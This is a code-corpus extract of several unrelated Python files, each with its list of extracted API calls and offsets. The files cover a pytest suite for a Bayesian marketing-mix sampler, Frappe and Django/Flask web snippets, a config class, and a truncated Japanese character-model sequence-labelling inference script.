(2221, 2246), True, 'import torch.nn as nn\n'), ((2311, 2384), 'torch.zeros', 'torch.zeros', (['self.num_layers', 'batch_size', 'self.hidden_size'], {'device': 'device'}), '(self.num_layers, batch_size, self.hidden_size, device=device)\n', (2322, 2384), False, 'import torch\n'), ((2404, 2477), 'torch.zeros', 'torch.zeros', (['self.num_layers', 'batch_size', 'self.hidden_size'], {'device': 'device'}), '(self.num_layers, batch_size, self.hidden_size, device=device)\n', (2415, 2477), False, 'import torch\n'), ((3663, 3678), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (3676, 3678), False, 'import torch\n')]
|
from _pytest.mark import param
import pytest
import numpy as np
from bayesian_mmm.sampling.stan_model_generator import StanModelGenerator
from bayesian_mmm.sampling.sampler import Sampler
from bayesian_mmm.sampling.stan_model_wrapper import StanModelWrapper
MAX_LAG = 4
SPENDS = np.array([[10, 20], [0, 8], [1, 30], [5, 40]])
LAGGED_SPENDS = np.array([
[[10, 0, 0, 0], [20, 0, 0, 0]],
[[ 0, 10, 0, 0], [ 8, 20, 0, 0]],
[[ 1, 0, 10, 0], [30, 8, 20, 0]],
[[ 5, 1, 0, 10], [40, 30, 8, 20]]
])
CTRL_VARS = np.array([
[2, 4],
[5, 2],
[6, 4],
[7, 2]
])
REVENUE = np.array([1, 2, 3, 4])
N = 4
NUM_MEDIA = 2
NUM_CTRL = 2
STAN_MODEL = StanModelWrapper
@pytest.mark.parametrize(
"ctrl_vars", [CTRL_VARS, None]
)
def test_create_sampler_input(ctrl_vars):
if type(ctrl_vars) == np.ndarray:
expected_args = {
"N":N,
"Y":REVENUE,
"max_lag":MAX_LAG,
"num_media":NUM_MEDIA,
"X_media":LAGGED_SPENDS,
"num_ctrl":NUM_CTRL,
"X_ctrl":CTRL_VARS
}
else:
expected_args = {
"N":N,
"Y":REVENUE,
"max_lag":MAX_LAG,
"num_media":NUM_MEDIA,
"X_media":LAGGED_SPENDS
}
sampler = Sampler(STAN_MODEL, MAX_LAG)
sampler.create_stan_input(
SPENDS, ctrl_vars, REVENUE
)
obtained_args = sampler._Sampler__args
expected_args_keys = list(expected_args.keys())
expected_args_keys.sort()
obtained_args_keys = list(obtained_args.keys())
obtained_args_keys.sort()
assert obtained_args_keys == expected_args_keys
for key, val in expected_args.items():
if type(val) == np.ndarray:
assert (val == obtained_args[key]).all()
else:
assert val == obtained_args[key]
# slow to run (stan compilation + sampling)
@pytest.mark.parametrize(
"carryover_transfo_nm,diminushing_returns_transfo_nm,with_ctrl_vars",
[
("adstock","hill",True),
("adstock","hill",False),
("adstock","reach",True),
("adstock","reach",False),
("geo_decay","hill",True),
("geo_decay","hill",False),
("geo_decay","reach",True),
("geo_decay","reach",False)
]
)
def test_run_sampling(
carryover_transfo_nm,
diminushing_returns_transfo_nm,
with_ctrl_vars
):
CARRYOVER_TRANSFO_NM_TO_PARAM_NM = {
"geo_decay":["retain_rate"],
"adstock":["retain_rate", "delay"]
}
DIMINUSHING_RETURNS_TRANSFO_NM_TO_PARAM_NM = {
"hill":["ec", "slope"],
"reach":["half_saturation"]
}
WITH_CTRL_VARS_TO_PARAM_NM = {
True:["gamma_ctrl"],
False:[]
}
stan_model_generator = StanModelGenerator(
carryover_transfo_nm,
diminushing_returns_transfo_nm,
with_ctrl_vars
)
stan_model_generator.create_model()
stan_model = stan_model_generator.get_model()
sampler = Sampler(stan_model, MAX_LAG)
if with_ctrl_vars:
ctrl_vars = CTRL_VARS
else:
ctrl_vars = None
sampler.create_stan_input(
SPENDS,
ctrl_vars,
REVENUE
)
obtained_results = sampler.run_sampling(100, 3)
expected_param_nms = (
CARRYOVER_TRANSFO_NM_TO_PARAM_NM[carryover_transfo_nm]
+ DIMINUSHING_RETURNS_TRANSFO_NM_TO_PARAM_NM[diminushing_returns_transfo_nm]
+ WITH_CTRL_VARS_TO_PARAM_NM[with_ctrl_vars]
+ ["beta_medias", "tau"]
)
expected_param_nms.sort()
obtained_params_nms = list(obtained_results.keys())
obtained_params_nms.sort()
assert expected_param_nms == obtained_params_nms
for param_nm, values in obtained_results.items():
if param_nm != "tau":
assert values.shape == (100,2)
else:
assert values.shape == (100,)
|
[
"bayesian_mmm.sampling.stan_model_generator.StanModelGenerator",
"pytest.mark.parametrize",
"numpy.array",
"bayesian_mmm.sampling.sampler.Sampler"
] |
[((281, 327), 'numpy.array', 'np.array', (['[[10, 20], [0, 8], [1, 30], [5, 40]]'], {}), '([[10, 20], [0, 8], [1, 30], [5, 40]])\n', (289, 327), True, 'import numpy as np\n'), ((344, 490), 'numpy.array', 'np.array', (['[[[10, 0, 0, 0], [20, 0, 0, 0]], [[0, 10, 0, 0], [8, 20, 0, 0]], [[1, 0, 10,\n 0], [30, 8, 20, 0]], [[5, 1, 0, 10], [40, 30, 8, 20]]]'], {}), '([[[10, 0, 0, 0], [20, 0, 0, 0]], [[0, 10, 0, 0], [8, 20, 0, 0]], [\n [1, 0, 10, 0], [30, 8, 20, 0]], [[5, 1, 0, 10], [40, 30, 8, 20]]])\n', (352, 490), True, 'import numpy as np\n'), ((525, 567), 'numpy.array', 'np.array', (['[[2, 4], [5, 2], [6, 4], [7, 2]]'], {}), '([[2, 4], [5, 2], [6, 4], [7, 2]])\n', (533, 567), True, 'import numpy as np\n'), ((596, 618), 'numpy.array', 'np.array', (['[1, 2, 3, 4]'], {}), '([1, 2, 3, 4])\n', (604, 618), True, 'import numpy as np\n'), ((687, 742), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""ctrl_vars"""', '[CTRL_VARS, None]'], {}), "('ctrl_vars', [CTRL_VARS, None])\n", (710, 742), False, 'import pytest\n'), ((1886, 2237), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""carryover_transfo_nm,diminushing_returns_transfo_nm,with_ctrl_vars"""', "[('adstock', 'hill', True), ('adstock', 'hill', False), ('adstock', 'reach',\n True), ('adstock', 'reach', False), ('geo_decay', 'hill', True), (\n 'geo_decay', 'hill', False), ('geo_decay', 'reach', True), ('geo_decay',\n 'reach', False)]"], {}), "(\n 'carryover_transfo_nm,diminushing_returns_transfo_nm,with_ctrl_vars', [\n ('adstock', 'hill', True), ('adstock', 'hill', False), ('adstock',\n 'reach', True), ('adstock', 'reach', False), ('geo_decay', 'hill', True\n ), ('geo_decay', 'hill', False), ('geo_decay', 'reach', True), (\n 'geo_decay', 'reach', False)])\n", (1909, 2237), False, 'import pytest\n'), ((1285, 1313), 'bayesian_mmm.sampling.sampler.Sampler', 'Sampler', (['STAN_MODEL', 'MAX_LAG'], {}), '(STAN_MODEL, MAX_LAG)\n', (1292, 1313), False, 'from bayesian_mmm.sampling.sampler import Sampler\n'), ((2756, 2848), 'bayesian_mmm.sampling.stan_model_generator.StanModelGenerator', 'StanModelGenerator', (['carryover_transfo_nm', 'diminushing_returns_transfo_nm', 'with_ctrl_vars'], {}), '(carryover_transfo_nm, diminushing_returns_transfo_nm,\n with_ctrl_vars)\n', (2774, 2848), False, 'from bayesian_mmm.sampling.stan_model_generator import StanModelGenerator\n'), ((2980, 3008), 'bayesian_mmm.sampling.sampler.Sampler', 'Sampler', (['stan_model', 'MAX_LAG'], {}), '(stan_model, MAX_LAG)\n', (2987, 3008), False, 'from bayesian_mmm.sampling.sampler import Sampler\n')]
|
from __future__ import unicode_literals
import frappe
from frappe.desk.doctype.notification_log.notification_log import enqueue_create_notification,\
get_title, get_title_html
def execute():
set_title_wp_as_civil_id()
set_title_mi_as_civil_id()
set_title_moi_as_civil_id()
set_title_fp_as_civil_id()
def set_title_wp_as_civil_id():
for doc in frappe.get_all('Work Permit'):
wp_doc = frappe.get_doc('Work Permit',doc.name)
wp_doc.title = wp_doc.civil_id
print(doc.name)
print(wp_doc.title)
print("===========")
def set_title_mi_as_civil_id():
for doc in frappe.get_all('Medical Insurance'):
mi_doc = frappe.get_doc('Medical Insurance',doc.name)
mi_doc.title = mi_doc.civil_id
print(doc.name)
print(mi_doc.title)
print("===========")
def set_title_moi_as_civil_id():
for doc in frappe.get_all('MOI Residency Jawazat'):
moi_doc = frappe.get_doc('MOI Residency Jawazat',doc.name)
moi_doc.title = moi_doc.one_fm_civil_id
print(doc.name)
print(moi_doc.title)
print("===========")
def set_title_fp_as_civil_id():
for doc in frappe.get_all('Fingerprint Appointment'):
fp_doc = frappe.get_doc('Fingerprint Appointment',doc.name)
fp_doc.title = fp_doc.civil_id
print(doc.name)
print(fp_doc.title)
print("===========")
|
[
"frappe.get_doc",
"frappe.get_all"
] |
[((366, 395), 'frappe.get_all', 'frappe.get_all', (['"""Work Permit"""'], {}), "('Work Permit')\n", (380, 395), False, 'import frappe\n'), ((621, 656), 'frappe.get_all', 'frappe.get_all', (['"""Medical Insurance"""'], {}), "('Medical Insurance')\n", (635, 656), False, 'import frappe\n'), ((889, 928), 'frappe.get_all', 'frappe.get_all', (['"""MOI Residency Jawazat"""'], {}), "('MOI Residency Jawazat')\n", (903, 928), False, 'import frappe\n'), ((1175, 1216), 'frappe.get_all', 'frappe.get_all', (['"""Fingerprint Appointment"""'], {}), "('Fingerprint Appointment')\n", (1189, 1216), False, 'import frappe\n'), ((414, 453), 'frappe.get_doc', 'frappe.get_doc', (['"""Work Permit"""', 'doc.name'], {}), "('Work Permit', doc.name)\n", (428, 453), False, 'import frappe\n'), ((675, 720), 'frappe.get_doc', 'frappe.get_doc', (['"""Medical Insurance"""', 'doc.name'], {}), "('Medical Insurance', doc.name)\n", (689, 720), False, 'import frappe\n'), ((948, 997), 'frappe.get_doc', 'frappe.get_doc', (['"""MOI Residency Jawazat"""', 'doc.name'], {}), "('MOI Residency Jawazat', doc.name)\n", (962, 997), False, 'import frappe\n'), ((1235, 1286), 'frappe.get_doc', 'frappe.get_doc', (['"""Fingerprint Appointment"""', 'doc.name'], {}), "('Fingerprint Appointment', doc.name)\n", (1249, 1286), False, 'import frappe\n')]
|
import json
class Config:
def __init__(self, file=None):
with open(file) as cfg_file:
self._cfg = json.load(cfg_file)
self._scopes = [scope for scope in self._cfg['scopes']]
self._scope_index = 0
self._current_scope: dict = self._scopes[0]
def next_scope(self) -> bool:
"""
Increments the current scope. Returns `True` if successful,
otherwise `False`.
"""
if self._scope_index + 1 >= len(self._scopes):
return False
self._scope_index += 1
self._current_scope = self._scopes[self._scope_index]
return True
def prev_scope(self) -> bool:
"""
Decrements the current scope. Returns `True` if successful,
otherwise `False`.
"""
if self._scope_index - 1 < 0:
return False
self._scope_index -= 1
self._current_scope = self._scopes[self._scope_index]
return True
def actions(self, phrase: str) -> list:
"""
Returns the actions to be executed when the `phrase` is said
or an empty list if the `phrase` isn't recognized.
"""
return self._current_scope.get(phrase, [])
def phrases(self) -> set:
"""
Return the possible phrases that can be said in the current
scope.
"""
return set(phrase for phrase in self._current_scope.keys())
def __repr__(self):
return str(self._scopes)
if __name__ == '__main__':
cfg = Config('test_format.json')
assert cfg.next_scope()
assert not cfg.next_scope()
assert cfg.prev_scope()
assert not cfg.prev_scope()
assert {'forward', 'back', 'next set'} == cfg.phrases()
assert ['right'] == cfg.actions('forward')
print("Passed")
|
[
"json.load"
] |
[((124, 143), 'json.load', 'json.load', (['cfg_file'], {}), '(cfg_file)\n', (133, 143), False, 'import json\n')]
|
import requests
import pprint
pp = pprint.PrettyPrinter(indent=4)
# Example for making a GET requests
link = 'http://localhost:5000/example-get-static'
response = requests.get(link)
responseDict = response.json()
pp.pprint(responseDict)
# access the dict
print(responseDict['num-example'])
# your name goes here
name = "name"
link2 = 'http://localhost:5000/example-get-dynamic?name={name}'.format(name=name)
response = requests.get(link2)
responseDict = response.json()
pp.pprint(responseDict)
|
[
"pprint.PrettyPrinter",
"requests.get"
] |
[((36, 66), 'pprint.PrettyPrinter', 'pprint.PrettyPrinter', ([], {'indent': '(4)'}), '(indent=4)\n', (56, 66), False, 'import pprint\n'), ((166, 184), 'requests.get', 'requests.get', (['link'], {}), '(link)\n', (178, 184), False, 'import requests\n'), ((426, 445), 'requests.get', 'requests.get', (['link2'], {}), '(link2)\n', (438, 445), False, 'import requests\n')]
|
from re import U
from flask import Blueprint, render_template,request,flash,redirect,url_for
from flask_login import login_required, current_user
from .models import Pitch,User,Comment,Like
from . import db
views = Blueprint("views", __name__)
@views.route("/")
@views.route("/home")
@login_required
def home():
pitches=Pitch.query.all()
return render_template("home.html", user=current_user,pitches=pitches)
@views.route("/create-pitch", methods=['GET', 'POST'])
@login_required
def create_pitch():
if request.method =="POST":
text = request.form.get('text')
if not text:
flash('This cannot be empty',category='error')
else:
pitch=Pitch(text=text,author=current_user.id)
db.session.add(pitch)
db.session.commit()
flash('Pitch Created!!',category='success')
return redirect(url_for('views.home'))
return render_template('create_pitch.html', user=current_user)
@views.route("/delete-pitch/<id>")
@login_required
def delete_pitch(id):
pitch = Pitch.query.filter_by(id=id).first()
if not pitch:
flash("Post does not exist.", category='error')
elif current_user.id != pitch.id:
flash('You do not have permission to delete this post.', category='error')
else:
db.session.delete(pitch)
db.session.commit()
flash('Pitch deleted.', category='success')
return redirect(url_for('views.home'))
@views.route("/pitches/<username>")
@login_required
def pitches(username):
user = User.query.filter_by(username=username).first()
if not user:
flash('No user with that username exists.', category='error')
return redirect(url_for('views.home'))
pitches=user.pitches
return render_template("pitch.html", user=current_user, pitches=pitches, username=username)
@views.route("/create-comment/<pitch_id>", methods=['POST'])
@login_required
def create_comment(pitch_id):
text = request.form.get('text')
if not text:
flash('Comment cannot be empty.', category='error')
else:
pitch = Pitch.query.filter_by(id=pitch_id)
if pitch:
comment = Comment(
text=text, author=current_user.id, pitch_id=pitch_id)
db.session.add(comment)
db.session.commit()
else:
flash('Post does not exist.', category='error')
return redirect(url_for('views.home'))
@views.route("/delete-comment/<comment_id>")
@login_required
def delete_comment(comment_id):
comment = Comment.query.filter_by(id=comment_id).first()
if not comment:
flash('Comment does not exist.', category='error')
elif current_user.id != comment.author and current_user.id != comment.pitch.author:
flash('You do not have permission to delete this comment.', category='error')
else:
db.session.delete(comment)
db.session.commit()
return redirect(url_for('views.home'))
|
[
"flask.flash",
"flask.Blueprint",
"flask.request.form.get",
"flask.url_for",
"flask.render_template"
] |
[((216, 244), 'flask.Blueprint', 'Blueprint', (['"""views"""', '__name__'], {}), "('views', __name__)\n", (225, 244), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((356, 420), 'flask.render_template', 'render_template', (['"""home.html"""'], {'user': 'current_user', 'pitches': 'pitches'}), "('home.html', user=current_user, pitches=pitches)\n", (371, 420), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((930, 985), 'flask.render_template', 'render_template', (['"""create_pitch.html"""'], {'user': 'current_user'}), "('create_pitch.html', user=current_user)\n", (945, 985), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((1779, 1868), 'flask.render_template', 'render_template', (['"""pitch.html"""'], {'user': 'current_user', 'pitches': 'pitches', 'username': 'username'}), "('pitch.html', user=current_user, pitches=pitches, username=\n username)\n", (1794, 1868), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((1983, 2007), 'flask.request.form.get', 'request.form.get', (['"""text"""'], {}), "('text')\n", (1999, 2007), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((559, 583), 'flask.request.form.get', 'request.form.get', (['"""text"""'], {}), "('text')\n", (575, 583), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((1136, 1183), 'flask.flash', 'flash', (['"""Post does not exist."""'], {'category': '"""error"""'}), "('Post does not exist.', category='error')\n", (1141, 1183), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((1449, 1470), 'flask.url_for', 'url_for', (['"""views.home"""'], {}), "('views.home')\n", (1456, 1470), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((1633, 1694), 'flask.flash', 'flash', (['"""No user with that username exists."""'], {'category': '"""error"""'}), "('No user with that username exists.', category='error')\n", (1638, 1694), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((2034, 2085), 'flask.flash', 'flash', (['"""Comment cannot be empty."""'], {'category': '"""error"""'}), "('Comment cannot be empty.', category='error')\n", (2039, 2085), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((2429, 2450), 'flask.url_for', 'url_for', (['"""views.home"""'], {}), "('views.home')\n", (2436, 2450), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((2636, 2686), 'flask.flash', 'flash', (['"""Comment does not exist."""'], {'category': '"""error"""'}), "('Comment does not exist.', category='error')\n", (2641, 2686), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((2955, 2976), 'flask.url_for', 'url_for', (['"""views.home"""'], {}), "('views.home')\n", (2962, 2976), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((626, 673), 'flask.flash', 'flash', (['"""This cannot be empty"""'], {'category': '"""error"""'}), "('This cannot be empty', category='error')\n", (631, 673), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((823, 867), 'flask.flash', 'flash', (['"""Pitch Created!!"""'], {'category': '"""success"""'}), "('Pitch Created!!', category='success')\n", (828, 867), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((891, 912), 'flask.url_for', 'url_for', (['"""views.home"""'], {}), "('views.home')\n", (898, 912), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((1230, 1304), 'flask.flash', 'flash', (['"""You do not have permission to delete this post."""'], {'category': '"""error"""'}), "('You do not have permission to delete this post.', category='error')\n", (1235, 1304), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((1384, 1427), 'flask.flash', 'flash', (['"""Pitch deleted."""'], {'category': '"""success"""'}), "('Pitch deleted.', category='success')\n", (1389, 1427), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((1719, 1740), 'flask.url_for', 'url_for', (['"""views.home"""'], {}), "('views.home')\n", (1726, 1740), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((2360, 2407), 'flask.flash', 'flash', (['"""Post does not exist."""'], {'category': '"""error"""'}), "('Post does not exist.', category='error')\n", (2365, 2407), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((2783, 2860), 'flask.flash', 'flash', (['"""You do not have permission to delete this comment."""'], {'category': '"""error"""'}), "('You do not have permission to delete this comment.', category='error')\n", (2788, 2860), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n')]
|
from django.shortcuts import render, render_to_response
from django import forms
from django.http import HttpResponse
from django.forms import ModelForm
from user_manage.models import User
from django.views.decorators.csrf import csrf_exempt
from django.utils import timezone
import requests
from colock.key_generator import *
from colock.utils import hook
import json
import colock.Error
class RegisterForm(ModelForm):
class Meta:
model = User
fields = ['cid', 'phone_num', 'region_num', 'nickname', 'user_name', 'user_logo']
verify_code = forms.IntegerField()
class RegisterReturnForm(forms.Form):
uid = forms.IntegerField()
ukey = forms.CharField(max_length=32)
class MobSMS:
def __init__(self, appkey):
self.appkey = appkey
self.verify_url = 'https://api.sms.mob.com/sms/verify'
def verify_sms_code(self, zone, phone, code, debug=False):
if debug:
return 200
data = {'appkey': self.appkey, 'phone': phone, 'zone': zone, 'code': code}
req = requests.post(self.verify_url, data=data, verify=False)
if req.status_code == 200:
j = req.json()
return j
return json.dumps({'status': 500})
# this is not safe!!!
@csrf_exempt
def register(request):
def register_verify(user, vcode):
res = mobsms.verify_sms_code(user.region_num, user.phone_num, vcode)
if (json.loads(res))['status'] == 200:
return True
else:
return False
if request.method == "POST":
reg_form = RegisterForm(request.POST)
if reg_form.is_valid():
new_user = reg_form.save(commit=False)
new_user.reg_time = timezone.now()
new_user.ukey = user_key_gen(new_user.id, new_user.region_num, new_user.phone_num, new_user.reg_time)
new_user.phone_hash = phone_hash_gen(new_user.region_num, new_user.phone_num)
new_user.user_logo = request.FILES['user_logo']
verify_code = request.POST['verify_code']
if register_verify(new_user.region_num, new_user.phone_num, verify_code):
new_user.save()
return_value = {'uid': new_user.id, 'ukey': new_user.ukey}
# ensure_ascii=False to handle Chinese
return HttpResponse(json.dumps(return_value, ensure_ascii=False))
# success and created new user
else:
return HttpResponse('Authen Error', status=500)
else:
uf = RegisterForm()
return render_to_response('register.html', {'uf': uf})
mobsms = MobSMS("5fc5a301e100") ### add real keys here!!!
@hook("verify")
def verify(meta, data):
uid = meta['uid']
vcode = data['code']
user = User.objects.get(id=uid)
user.verify_code = vcode
user.verified = False
res = mobsms.verify_sms_code(user.region_num, user.phone_num, vcode)
if ( (json.loads(res))['status'] == 200 ):
user.verified = True
user.save()
return '', '', res
|
[
"colock.utils.hook",
"django.shortcuts.render_to_response",
"django.forms.IntegerField",
"json.loads",
"django.http.HttpResponse",
"django.utils.timezone.now",
"json.dumps",
"requests.post",
"django.forms.CharField",
"user_manage.models.User.objects.get"
] |
[((2660, 2674), 'colock.utils.hook', 'hook', (['"""verify"""'], {}), "('verify')\n", (2664, 2674), False, 'from colock.utils import hook\n'), ((570, 590), 'django.forms.IntegerField', 'forms.IntegerField', ([], {}), '()\n', (588, 590), False, 'from django import forms\n'), ((641, 661), 'django.forms.IntegerField', 'forms.IntegerField', ([], {}), '()\n', (659, 661), False, 'from django import forms\n'), ((673, 703), 'django.forms.CharField', 'forms.CharField', ([], {'max_length': '(32)'}), '(max_length=32)\n', (688, 703), False, 'from django import forms\n'), ((2551, 2598), 'django.shortcuts.render_to_response', 'render_to_response', (['"""register.html"""', "{'uf': uf}"], {}), "('register.html', {'uf': uf})\n", (2569, 2598), False, 'from django.shortcuts import render, render_to_response\n'), ((2757, 2781), 'user_manage.models.User.objects.get', 'User.objects.get', ([], {'id': 'uid'}), '(id=uid)\n', (2773, 2781), False, 'from user_manage.models import User\n'), ((1046, 1101), 'requests.post', 'requests.post', (['self.verify_url'], {'data': 'data', 'verify': '(False)'}), '(self.verify_url, data=data, verify=False)\n', (1059, 1101), False, 'import requests\n'), ((1200, 1227), 'json.dumps', 'json.dumps', (["{'status': 500}"], {}), "({'status': 500})\n", (1210, 1227), False, 'import json\n'), ((1708, 1722), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (1720, 1722), False, 'from django.utils import timezone\n'), ((2920, 2935), 'json.loads', 'json.loads', (['res'], {}), '(res)\n', (2930, 2935), False, 'import json\n'), ((1415, 1430), 'json.loads', 'json.loads', (['res'], {}), '(res)\n', (1425, 1430), False, 'import json\n'), ((2461, 2501), 'django.http.HttpResponse', 'HttpResponse', (['"""Authen Error"""'], {'status': '(500)'}), "('Authen Error', status=500)\n", (2473, 2501), False, 'from django.http import HttpResponse\n'), ((2327, 2371), 'json.dumps', 'json.dumps', (['return_value'], {'ensure_ascii': '(False)'}), '(return_value, ensure_ascii=False)\n', (2337, 2371), False, 'import json\n')]
|
"""
This file contains strings which need i18n but doesn't have a place in any files.
They maybe appear in DB only, so they can't be detected without being writed explicitly.
"""
from django.utils.translation import gettext_lazy as _
I18N_NEEDED = [
_('T00 member'),
_('T01 member'),
_('T02 member'),
_('T11 member'),
_('T12 member'),
_('T21 member'),
_('T22 member'),
_('T31 member'),
_('T32 member'),
_('T00 supervisor'),
_('T01 supervisor'),
_('T02 supervisor'),
_('T11 supervisor'),
_('T12 supervisor'),
_('T21 supervisor'),
_('T22 supervisor'),
_('T31 supervisor'),
_('T32 supervisor'),
]
|
[
"django.utils.translation.gettext_lazy"
] |
[((255, 270), 'django.utils.translation.gettext_lazy', '_', (['"""T00 member"""'], {}), "('T00 member')\n", (256, 270), True, 'from django.utils.translation import gettext_lazy as _\n'), ((276, 291), 'django.utils.translation.gettext_lazy', '_', (['"""T01 member"""'], {}), "('T01 member')\n", (277, 291), True, 'from django.utils.translation import gettext_lazy as _\n'), ((297, 312), 'django.utils.translation.gettext_lazy', '_', (['"""T02 member"""'], {}), "('T02 member')\n", (298, 312), True, 'from django.utils.translation import gettext_lazy as _\n'), ((318, 333), 'django.utils.translation.gettext_lazy', '_', (['"""T11 member"""'], {}), "('T11 member')\n", (319, 333), True, 'from django.utils.translation import gettext_lazy as _\n'), ((339, 354), 'django.utils.translation.gettext_lazy', '_', (['"""T12 member"""'], {}), "('T12 member')\n", (340, 354), True, 'from django.utils.translation import gettext_lazy as _\n'), ((360, 375), 'django.utils.translation.gettext_lazy', '_', (['"""T21 member"""'], {}), "('T21 member')\n", (361, 375), True, 'from django.utils.translation import gettext_lazy as _\n'), ((381, 396), 'django.utils.translation.gettext_lazy', '_', (['"""T22 member"""'], {}), "('T22 member')\n", (382, 396), True, 'from django.utils.translation import gettext_lazy as _\n'), ((402, 417), 'django.utils.translation.gettext_lazy', '_', (['"""T31 member"""'], {}), "('T31 member')\n", (403, 417), True, 'from django.utils.translation import gettext_lazy as _\n'), ((423, 438), 'django.utils.translation.gettext_lazy', '_', (['"""T32 member"""'], {}), "('T32 member')\n", (424, 438), True, 'from django.utils.translation import gettext_lazy as _\n'), ((444, 463), 'django.utils.translation.gettext_lazy', '_', (['"""T00 supervisor"""'], {}), "('T00 supervisor')\n", (445, 463), True, 'from django.utils.translation import gettext_lazy as _\n'), ((469, 488), 'django.utils.translation.gettext_lazy', '_', (['"""T01 supervisor"""'], {}), "('T01 supervisor')\n", (470, 488), True, 'from django.utils.translation import gettext_lazy as _\n'), ((494, 513), 'django.utils.translation.gettext_lazy', '_', (['"""T02 supervisor"""'], {}), "('T02 supervisor')\n", (495, 513), True, 'from django.utils.translation import gettext_lazy as _\n'), ((519, 538), 'django.utils.translation.gettext_lazy', '_', (['"""T11 supervisor"""'], {}), "('T11 supervisor')\n", (520, 538), True, 'from django.utils.translation import gettext_lazy as _\n'), ((544, 563), 'django.utils.translation.gettext_lazy', '_', (['"""T12 supervisor"""'], {}), "('T12 supervisor')\n", (545, 563), True, 'from django.utils.translation import gettext_lazy as _\n'), ((569, 588), 'django.utils.translation.gettext_lazy', '_', (['"""T21 supervisor"""'], {}), "('T21 supervisor')\n", (570, 588), True, 'from django.utils.translation import gettext_lazy as _\n'), ((594, 613), 'django.utils.translation.gettext_lazy', '_', (['"""T22 supervisor"""'], {}), "('T22 supervisor')\n", (595, 613), True, 'from django.utils.translation import gettext_lazy as _\n'), ((619, 638), 'django.utils.translation.gettext_lazy', '_', (['"""T31 supervisor"""'], {}), "('T31 supervisor')\n", (620, 638), True, 'from django.utils.translation import gettext_lazy as _\n'), ((644, 663), 'django.utils.translation.gettext_lazy', '_', (['"""T32 supervisor"""'], {}), "('T32 supervisor')\n", (645, 663), True, 'from django.utils.translation import gettext_lazy as _\n')]
|
#-*-coding:utf-8-*-
import os
import re
import json
import time
import glob
import random
import argparse
import numpy as np
import pandas as pd
from tqdm import tqdm
import torch
from torch.utils.data import DataLoader
from transformers import AutoTokenizer, AutoModel
from shiba import Shiba, CodepointTokenizer, get_pretrained_state_dict
from datasets import CharbertDataset, ShibaDataset, collate_fn
from models import CharbertForSequenceLabeling, ShibaForSequenceLabeling
from utils import epoch_time, decode_attr_bio, operate_bio, set_seed
def parse_arg():
parser = argparse.ArgumentParser()
parser.add_argument("--input_plain_path", type=str)
parser.add_argument("--input_annotation_path", type=str)
parser.add_argument("--output_path", type=str)
parser.add_argument("--category", type=str)
parser.add_argument("--block", type=str)
parser.add_argument("--model", type=str)
parser.add_argument("--batch_size", type=int)
parser.add_argument("--cuda", type=int)
return parser.parse_args()
if __name__ == "__main__":
args = parse_arg()
INPUT_PLAIN_PATH = args.input_plain_path
INPUT_ANNOTATION_PATH = args.input_annotation_path
OUTPUT_PATH = args.output_path
CATEGORY = args.category
BLOCK = args.block
MODEL = args.model
BATCH_SIZE = args.batch_size
CUDA = args.cuda
OUTPUT_PATH = OUTPUT_PATH+CATEGORY.lower()+'_'+MODEL.lower()+'_'+BLOCK.lower()+'/'
with open(OUTPUT_PATH+'params.json', 'r') as f:
params = dict(json.load(f))
SEED = params['seed']
MAX_LENGTH = params['max_length']
set_seed(SEED)
device = torch.device("cuda:"+str(CUDA) if torch.cuda.is_available() else "cpu")
print('read annotation files')
df = pd.read_json(INPUT_ANNOTATION_PATH+CATEGORY+'_dist.json', orient='records', lines=True)
attr2idx = {attr:i for i, attr in enumerate(sorted(set(df['attribute'])))}
idx2attr = {v:k for k, v in attr2idx.items()}
bio2idx = {'B':0, 'I':1, 'O':2}
idx2bio = {v:k for k, v in bio2idx.items()}
page_id_list = [int(path.split('/')[-1][:-4]) for path in sorted(glob.glob(INPUT_PLAIN_PATH+CATEGORY+'/*'))]
print('read plain files')
pred_page2plain = {}
for page_id in page_id_list:
with open(INPUT_PLAIN_PATH+CATEGORY+'/'+str(page_id)+'.txt', 'r') as f:
pred_page2plain[page_id] = f.readlines()
print('load models')
if MODEL == 'charbert':
pretrained_model = 'cl-tohoku/bert-base-japanese-char-whole-word-masking'
tokenizer = AutoTokenizer.from_pretrained(pretrained_model)
bert = AutoModel.from_pretrained(pretrained_model)
model = CharbertForSequenceLabeling(bert, attr_size=len(attr2idx), label_size=len(bio2idx))
else:
tokenizer = CodepointTokenizer()
shiba = Shiba()
shiba.load_state_dict(get_pretrained_state_dict())
model = ShibaForSequenceLabeling(shiba, attr_size=len(attr2idx), label_size=len(bio2idx))
model.load_state_dict(torch.load(OUTPUT_PATH+'best_model.pt'))
bar = tqdm(total=len(pred_page2plain))
result_list = []
for idx, page_id in enumerate(list(pred_page2plain.keys())):
page2plain = {page_id:pred_page2plain[page_id]}
if MODEL == 'charbert':
ds = CharbertDataset(page2plain, tokenizer, attr2idx, bio2idx, MAX_LENGTH, BLOCK, None)
else:
ds = ShibaDataset(page2plain, tokenizer, attr2idx, bio2idx, MAX_LENGTH, BLOCK, None)
dl = DataLoader(ds, batch_size=BATCH_SIZE, collate_fn=collate_fn)
